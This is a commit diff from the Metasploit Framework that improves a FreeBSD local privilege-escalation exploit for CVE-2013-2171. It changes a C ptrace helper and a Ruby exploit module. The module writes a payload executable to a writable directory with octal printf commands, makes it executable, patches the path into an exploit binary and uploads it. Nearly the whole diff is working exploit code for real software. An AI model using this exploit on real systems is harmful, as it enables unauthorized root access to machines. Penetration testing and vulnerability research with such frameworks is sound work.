Land #2023 - Improve CVE-2013-2171

unstable
sinn3r 2013-06-25 10:58:01 -05:00
commit 97ab9fa8df
3 changed files with 21 additions and 11 deletions

Binary file not shown.

View File

@ -17,7 +17,7 @@ int main(int ac, char **av) {
struct ptrace_io_desc piod;
char *s, *d;
int pid;
char *bin = "/tmp/W00T"; // "W00T" is just a place holder
char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"; // is just a place holder
if (geteuid() == 0) {
setuid(0);

View File

@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info={})
@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
'DisclosureDate' => "Jun 18 2013",
}
))
register_options([
# It isn't OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
], self.class)
end
def check
@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
Exploit::CheckCode::Safe
end
def write_file(data, fname)
def write_file(fname, data)
oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
session.shell_command_token("chmod +x #{fname}")
@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
return (chk =~ /ERROR: cannot open/) ? false : true
end
def upload_payload
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
fname = datastore['WritableDir']
fname = "#{fname}/" unless fname =~ %r'/$'
if fname.length > 36
fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
end
fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
p = generate_payload_exe
f = write_file(p, fname)
f = write_file(fname, p)
return nil if not f
fname
end
@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
# Metasm does not support FreeBSD executable generation.
#
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
f = File.open(path, 'rb')
x = f.read(f.stat.size)
f.close
x.gsub(/W00T/, File.basename(payload_fname))
x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
end
def upload_exploit(payload_fname)
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
bin = generate_exploit(payload_fname)
f = write_file(bin, fname)
f = write_file(fname, bin)
return nil if not f
fname
end